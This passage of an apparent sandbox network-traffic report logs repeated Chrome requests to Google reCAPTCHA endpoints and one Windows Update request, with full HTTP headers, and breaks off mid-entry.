_GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6dVEIzpM3JHrpCYl9jcz_iqJn4_8jFXNv0yxm-6V4bX-xWihKEepTmtHOMOHVz3RjBTrXT7dN7gYxYTmvM9pch9frD_2Mt3aIGC1iHFdAculPLW-E-pvMwfXqdU-eFFIvfmgYdo6khSBA0SncV71vkgo0b4sCXigzgrEIRJFzMpiO5gqUj7ZosUIYXEi-OK8ItEStpAw4diRUHM1nMSnHfpBwisw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=6666e44f208ad0c5 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA57XaTzOr6lK-Qv7FFr_QBTPg0S8x0jkWwDyC7I6UHEXC_XFxPaNqt8KR5xYQPoeFcfsjB-M6tXRtBbavQjQWJCF7mZN9_aP-wLP44nVLa4RsNQZUeJDb29hxYKY4rlLOPTs_Td0kCcdGPGiv5xvNGkdS21kUFEBG7OcPIeL4i8e4t6Asyt6YxmP6fiTpBCxz4DxQ7Ys1AsZnDHJBqenX9jed7huQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=d54059ff5f6fc7f7 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7xha3gxL0LyuWF8xqJSoCy9aQ-CZnuJeBttoz9_4u-0dr2ooWnm-XyId997e5APa7ifIuB7pzFl0Ld1JHgMi727Mh_bXvh33TfwJ0QP4-jBMaOIGMY9nVllrV0ucFNLw_YWa5NAg0HBGl7nBIePGFmWIlko0bVYW4FzRKb_r8YRN5GuA3Fdmj1g-URC-WVZUOlHiPBV-qRB8c5HFucXS6ADUe7iw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e16caff0ee415144 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA57XaTzOr6lK-Qv7FFr_QBTPg0S8x0jkWwDyC7I6UHEXC_XFxPaNqt8KR5xYQPoeFcfsjB-M6tXRtBbavQjQWJCF7mZN9_aP-wLP44nVLa4RsNQZUeJDb29hxYKY4rlLOPTs_Td0kCcdGPGiv5xvNGkdS21kUFEBG7OcPIeL4i8e4t6Asyt6YxmP6fiTpBCxz4DxQ7Ys1AsZnDHJBqenX9jed7huQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=d54059ff5f6fc7f7 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA4bYc0s2zwhr0Dhx3dOazn3Hh4p7uY3CSETn6dA6rvCiWHE9OA-nOmnfN2ANundmWGke1Bjv2xi-GV3TO2LoMbXM_R2zufPfoD0XFD4lwrhK2FVthto7931CtAU3kcdffWKVtfZ2JNZsE0pCei2Leq-gBpTy3a6KgoAUB32sE_lB_-9wzhzHVikGwjcRkW_oG1wzKT1sJC3C7lN64gfM9pbHpzGzQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=8a68f4902f9f4669 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA4bYc0s2zwhr0Dhx3dOazn3Hh4p7uY3CSETn6dA6rvCiWHE9OA-nOmnfN2ANundmWGke1Bjv2xi-GV3TO2LoMbXM_R2zufPfoD0XFD4lwrhK2FVthto7931CtAU3kcdffWKVtfZ2JNZsE0pCei2Leq-gBpTy3a6KgoAUB32sE_lB_-9wzhzHVikGwjcRkW_oG1wzKT1sJC3C7lN64gfM9pbHpzGzQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=8a68f4902f9f4669 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ywH7FaLO6aH19wT&MD=noSDGOKd HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA4blY5MVPIuxvSqI2F8cJcTKI2jykD8dKcYCKNyJQdUqY-SQpdKOMdYDiVMy4PmaNToi6BkEpkYn5Zl4Gtipty5tV9tppOBZgn-Pgvikm2gLFlilOhjl2gYxwcbr39AqOMgA0M752LSRhzi28wHTsBKKrDYHyZwev37Obyl2ymyAWoy6C_LXFsPc9tyfe9W6qCDaYfwhprtiyWI7IdDeYk-gjLmVg&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=34d5e020329daa00 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA4blY5MVPIuxvSqI2F8cJcTKI2jykD8dKcYCKNyJQdUqY-SQpdKOMdYDiVMy4PmaNToi6BkEpkYn5Zl4Gtipty5tV9tppOBZgn-Pgvikm2gLFlilOhjl2gYxwcbr39AqOMgA0M752LSRhzi28wHTsBKKrDYHyZwev37Obyl2ymyAWoy6C_LXFsPc9tyfe9W6qCDaYfwhprtiyWI7IdDeYk-gjLmVg&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=34d5e020329daa00 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6aKgKXaVx0pzUyPhNpP81tC9vowwRIv_H5QEpw_3-VVjJAix-NPyxXGouAtmE_vTn4S_euGzGphYBBQHDxbQPANlvJA0FKUilBpXe45XLcNk7ElD-2BBdElX3zgpt8KT_nXNv4Nq9utVoF4ywsZvwR_z0gphSUFaSuQjnZENd_jRXJR1Pm2UFXwUh2k-4aITHgyHKtpHhb4bD9uwlpYOW4FhCp_w&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e2eca1451c1cfc28 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6aKgKXaVx0pzUyPhNpP81tC9vowwRIv_H5QEpw_3-VVjJAix-NPyxXGouAtmE_vTn4S_euGzGphYBBQHDxbQPANlvJA0FKUilBpXe45XLcNk7ElD-2BBdElX3zgpt8KT_nXNv4Nq9utVoF4ywsZvwR_z0gphSUFaSuQjnZENd_jRXJR1Pm2UFXwUh2k-4aITHgyHKtpHhb4bD9uwlpYOW4FhCp_w&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e2eca1451c1cfc28 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/userverify?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6LY5a_sjoH9yvpmbEh0CtZQlmUakH4UvubxSxHHJkgU0G9bAzr6I0MddOzcJEu1XGBmIC2cV6m0Dxir3cdfDboH-0g8Psw8c0T-mcrf7lkroG7ZwpNHkXk3HnLiiaEN-b8-mhRh2kd6qKZhKZi_wXtMyXqY98dgFWFNcsdHZk9KqUo9Qo36_5HKbaTC9lcL1LM6e10_ZL_O3CJeFLXF6TB_DfgLQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6LY5a_sjoH9yvpmbEh0CtZQlmUakH4UvubxSxHHJkgU0G9bAzr6I0MddOzcJEu1XGBmIC2cV6m0Dxir3cdfDboH-0g8Psw8c0T-mcrf7lkroG7ZwpNHkXk3HnLiiaEN-b8-mhRh2kd6qKZhKZi_wXtMyXqY98dgFWFNcsdHZk9KqUo9Qo36_5HKbaTC9lcL1LM6e10_ZL_O3CJeFLXF6TB_DfgLQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6ybvhC6a36EKdcCTGBHKZReYQA4R_kkyWNSJTDAm7m3lFMEhYkCENSDziHiW9sRhbOJ86_Rsz2zmABWs2jn-El121Z6wW8aDnqJ4qjwO5ZcN3u6_Qzb1T_FqjH0O-Yzag-DOjDPnlRhcPtZhGPXV1TKAg9b0B7NcFkz3bKVPSKNagZW5Tfeoh0tPt_RS9jsUxjM_M1IE9oo08LmfUhCYLue86Lrw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6ybvhC6a36EKdcCTGBHKZReYQA4R_kkyWNSJTDAm7m3lFMEhYkCENSDziHiW9sRhbOJ86_Rsz2zmABWs2jn-El121Z6wW8aDnqJ4qjwO5ZcN3u6_Qzb1T_FqjH0O-Yzag-DOjDPnlRhcPtZhGPXV1TKAg9b0B7NcFkz3bKVPSKNagZW5Tfeoh0tPt_RS9jsUxjM_M1IE9oo08LmfUhCYLue86Lrw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA5CRWb0pqYXQQK9znJ5KV0VwEOa4LwTb8cyN7pOwIZZ04W9ux6A5u-MAbH1xLyDQMREJb298rgjzqYg-SfwWz7xWuHpDGxazw8zRRljMsmI_2zKtxQ_m35rkCI5Lk7f5FhQABxvWvoIdrGF0A4ARXIg27QobrPOi2xAvxvGvMxG3zZi2Qucrr1lJTYtpc5XFS8wOT6E2kdH05v1_mpmO1RBCjs__A&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=70db3a36bb8782c5 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 